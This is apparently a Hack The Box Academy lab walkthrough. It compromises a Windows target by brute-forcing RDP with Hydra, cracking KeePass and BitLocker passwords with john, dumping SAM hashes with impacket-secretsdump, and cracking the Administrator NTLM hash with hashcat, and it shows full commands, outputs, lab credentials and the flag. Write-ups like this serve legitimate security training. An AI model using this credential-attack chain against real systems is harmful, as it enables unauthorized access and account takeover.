
Password Attacks Lab - Hard

ℹ️ Information


Question

Examine the third target and submit the contents of flag.txt in C:\Users\Administrator\Desktop\ as the answer.

📋 Walkthrough

First, we run a Recon scan on the target to identify open ports and services.

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ autonmap $target -t Recon        

Running a Recon scan on 10.129.59.220

Host is likely running Windows

---------------------Starting Port Scan-----------------------

PORT     STATE SERVICE
111/tcp  open  rpcbind
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2049/tcp open  nfs
3389/tcp open  ms-wbt-server
5985/tcp open  wsman

---------------------Starting Script Scan-----------------------

PORT     STATE SERVICE       VERSION
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  nlockmgr      1-4 (RPC #100021)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-03-18T12:05:15+00:00; -1h00m03s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: WINSRV
|   NetBIOS_Domain_Name: WINSRV
|   NetBIOS_Computer_Name: WINSRV
|   DNS_Domain_Name: WINSRV
|   DNS_Computer_Name: WINSRV
|   Product_Version: 10.0.17763
|_  System_Time: 2025-03-18T12:05:07+00:00
| ssl-cert: Subject: commonName=WINSRV
| Not valid before: 2025-03-17T11:44:15
|_Not valid after:  2025-09-16T11:44:15
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1h00m03s, deviation: 0s, median: -1h00m03s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-03-18T12:05:08
|_  start_date: N/A

Port 5985 is WinRM (Microsoft HTTPAPI), so the "Not Found" title is its normal response rather than a website worth enumerating. With the username johanna and our mutated wordlist mut.txt we brute-force RDP with Hydra:

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hydra -l johanna rdp://$target -P mut.txt   
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-18 13:20:25
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 94044 login tries (l:1/p:94044), ~23511 tries per task
[DATA] attacking rdp://10.129.59.220:3389/
[ERROR] freerdp: The connection failed to establish.
[3389][rdp] account on 10.129.59.220 might be valid but account not active for remote desktop: login: johanna password: 00000001, continuing attacking the account.
[ERROR] freerdp: The connection failed to establish.
[ERROR] freerdp: The connection failed to establish.
[ERROR] freerdp: The connection failed to establish.
<SNIP>
[3389][rdp] account on 10.129.59.220 might be valid but account not active for remote desktop: login: johanna password: 1231232001, continuing attacking the account.

[3389][rdp] host: 10.129.59.220   login: johanna   password: 1231234!
[ERROR] freerdp: The connection failed to establish.
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-18 13:26:22

Hydra finds the RDP credentials johanna:1231234!. The repeated "might be valid but account not active for remote desktop" lines are noise from the experimental rdp module (see the warning above), and the freerdp connection errors come from the server rejecting parallel connections; only the final host/login/password line is a confirmed hit. If the errors pile up, rerun with -t 1 -W 1 as Hydra suggests.

Logging in over RDP as johanna, we find a KeePass database, Logins.kdbx, in her Documents folder. We start an upload server on our attacking machine and push the file to it from the RDP session:

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ uploadserver  
File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

We extract the master-key hash with keepass2john and crack it with john, again using mut.txt:

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ keepass2john Logins.kdbx > hash 

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ john -w=mut.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Qwerty7!         (Logins)     
1g 0:00:00:51 DONE (2025-03-18 14:07) 0.01950g/s 1426p/s 1426c/s 1426C/s qwerty4!..Qwerty98
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
Opening Logins.kdbx with the master password Qwerty7! reveals the credentials david:gRzX7YbeTcDG7.

Logging in as david, we find a BitLocker-encrypted VHD backup in his Documents\David folder and copy it to a location we can reach for the upload:

-a----        2/11/2022   4:16 AM      136315392 Backup.vhd
PS C:\Users\david\Documents\David> cp .\Backup.vhd C:\Users\Public\Downloads
PS C:\Users\david\Documents\David>

We upload it to our server and run bitlocker2john on it. The tool can emit up to four hash types: $bitlocker$0$ and $1$ derive from the user password ($1$ skips MAC verification, so it is faster but prone to false positives), while $2$ and $3$ derive from the 48-digit recovery password. We keep only the $0$ user-password hash:

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ bitlocker2john -i Backup.vhd > hashesh

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ grep "bitlocker\$0" hashesh > hash

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ cat hash               
$bitlocker$0$16$60d83def3e335699830cc42793dae6e5$1048576$12$80b20a04341fd80103000000$60$ae149c9c17975483390d2afb7ff75c3e3380733976fa7d02bb29caebece6076c3c29096fc341a916c79b0db656a1f28e9f186e8b201c38653f64443a
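The grep above picks the line by its type prefix. As an added example (not part of this walkthrough or of bitlocker2john itself), the function below decodes a bitlocker2john line into its fields, checks that each declared length matches the hex payload, and selects hashes by type; the type labels follow bitlocker2john's documented mapping, the sample input is the $0$ line from this page plus one constructed junk line, and all names are our own.

```python
"""Added example: decode bitlocker2john output instead of grepping for it."""

# Hash-type labels as documented for john's bitlocker2john (assumption: the
# documented mapping, not something this page states).
BITLOCKER_TYPES = {
    0: "user password (MAC verified)",
    1: "user password (no MAC check; may give false positives)",
    2: "recovery password (MAC verified)",
    3: "recovery password (no MAC check)",
}

# Sample input: the single $0 line shown on this page, plus a constructed
# non-BitLocker line to show that malformed input is skipped.
SAMPLE = """\
$bitlocker$0$16$60d83def3e335699830cc42793dae6e5$1048576$12$80b20a04341fd80103000000$60$ae149c9c17975483390d2afb7ff75c3e3380733976fa7d02bb29caebece6076c3c29096fc341a916c79b0db656a1f28e9f186e8b201c38653f64443a
not-a-bitlocker-hash
"""


def parse_bitlocker_hash(line):
    """Split a $bitlocker$ line into its fields and validate the declared lengths.

    Layout: $bitlocker$<type>$<salt_len>$<salt>$<iterations>$<nonce_len>$<nonce>$<data_len>$<data>
    """
    parts = line.strip().split("$")
    # ['', 'bitlocker', type, salt_len, salt, iterations, nonce_len, nonce, data_len, data]
    if len(parts) != 10 or parts[1] != "bitlocker":
        raise ValueError("not a bitlocker2john hash")
    htype = int(parts[2])
    salt_len, salt = int(parts[3]), bytes.fromhex(parts[4])
    iterations = int(parts[5])
    nonce_len, nonce = int(parts[6]), bytes.fromhex(parts[7])
    data_len, data = int(parts[8]), bytes.fromhex(parts[9])
    if (len(salt), len(nonce), len(data)) != (salt_len, nonce_len, data_len):
        raise ValueError("declared length does not match hex payload")
    return {
        "type": htype,
        "label": BITLOCKER_TYPES.get(htype, "unknown"),
        "salt": salt,
        "iterations": iterations,  # this is john's "Cost 1 (iteration count)"
        "nonce": nonce,
        "data": data,
    }


def select_hashes(text, wanted_type=0):
    """Return the well-formed lines of the requested type (what the grep does,
    but ignoring anything that is not a valid bitlocker2john line)."""
    keep = []
    for line in text.splitlines():
        try:
            info = parse_bitlocker_hash(line)
        except ValueError:
            continue
        if info["type"] == wanted_type:
            keep.append(line.strip())
    return keep


if __name__ == "__main__":
    for line in select_hashes(SAMPLE):
        info = parse_bitlocker_hash(line)
        print(f"type {info['type']}: {info['label']}, "
              f"{info['iterations']} iterations, salt {info['salt'].hex()}")
```

Running it on the page's hash reports 1048576 iterations, which is exactly the cost john prints in the next step; a hash with a mismatched length field is rejected rather than silently passed on to the cracker.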

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ john -w=mut.txt hash
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Using default input encoding: UTF-8
Loaded 1 password hash (BitLocker, BitLocker [SHA-256 AES 32/64])
Cost 1 (iteration count) is 1048576 for all loaded hashes
Will run 24 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
123456789!       (?)     

john finds the volume password 123456789!. To reach the files we load the nbd kernel module (sudo modprobe nbd), attach the VHD as a network block device with qemu-nbd, decrypt the data partition with dislocker, and mount the plaintext image it exposes (both mount points must exist beforehand):
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ sudo qemu-nbd --connect=/dev/nbd0 Backup2.vhd -f vpc 

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ sudo fdisk -l /dev/nbd0                              
Disk /dev/nbd0: 130 MiB, 136314880 bytes, 266240 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: gpt
Disk identifier: E0E57133-41D5-4D8C-B375-F2A10AD403B0

Device      Start    End Sectors  Size Type
/dev/nbd0p1    34  32767   32734   16M Microsoft reserved
/dev/nbd0p2 32768 262143  229376  112M Microsoft basic data

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ sudo dislocker -V /dev/nbd0p2 -u123456789! -- ~/bitlocker_mount

┌──(kali㉿kali)-[~]
└─$ sudo mount -o loop ~/bitlocker_mount/dislocker-file ~/bitlocker_unlocked

┌──(kali㉿kali)-[~]
└─$ cd bitlocker_unlocked 

┌──(kali㉿kali)-[~/bitlocker_unlocked]
└─$ ls
'$RECYCLE.BIN'   SAM   SYSTEM  'System Volume Information'

The volume contains the SAM and SYSTEM registry hives, which is all impacket-secretsdump needs to dump the local NT hashes offline:

┌──(kali㉿kali)-[~/bitlocker_unlocked]
└─$ impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x62649a98dea282e3c3df04cc5fe4c130
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e53d4d912d96874e83429886c7bf22a1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9e73cc8353847cfce7b5f88061103b43:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:6ba6aae01bae3868d8bf31421d586153:::
david:1009:aad3b435b51404eeaad3b435b51404ee:b20d19ca5d5504a0c9ff7666fbe3ada5:::
johanna:1010:aad3b435b51404eeaad3b435b51404ee:0b8df7c13384227c017efc6db3913374:::
[*] Cleaning up... 

We save the Administrator NT hash (e53d4d912d96874e83429886c7bf22a1) to a file named hash and crack it with hashcat in NTLM mode (-m 1000). Guest and DefaultAccount carry 31d6cfe0d16ae931b73c59d7e0c089c0, the NT hash of an empty password, so there is nothing to crack there.

┌──(kali㉿kali)-[~/bitlocker_unlocked]
└─$ hashcat -m 1000 hash ~/Desktop/HTB/Academy/mut.txt       
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i7-13700KF, 14915/29894 MB (4096 MB allocatable), 24MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 6 MB

Dictionary cache built:
* Filename..: /home/kali/Desktop/HTB/Academy/mut.txt
* Passwords.: 94044
* Bytes.....: 1034072
* Keyspace..: 94044
* Runtime...: 0 secs

e53d4d912d96874e83429886c7bf22a1:Liverp00l8!

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1000 (NTLM)
Hash.Target......: e53d4d912d96874e83429886c7bf22a1
Time.Started.....: Tue Mar 18 14:55:46 2025 (0 secs)
Time.Estimated...: Tue Mar 18 14:55:46 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/kali/Desktop/HTB/Academy/mut.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 25585.0 kH/s (0.13ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 73728/94044 (78.40%)
Rejected.........: 0/73728 (0.00%)
Restore.Point....: 49152/94044 (52.26%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: l0vely84! -> R0ckst@r93
Hardware.Mon.#1..: Temp: 36c Util:  5%

Started: Tue Mar 18 14:55:45 2025
Stopped: Tue Mar 18 14:55:48 2025
With Administrator:Liverp00l8! we log in (RDP and WinRM are both open) and read the flag from C:\Users\Administrator\Desktop\flag.txt.

Answer

HTB{PWcr4ck1ngokokok}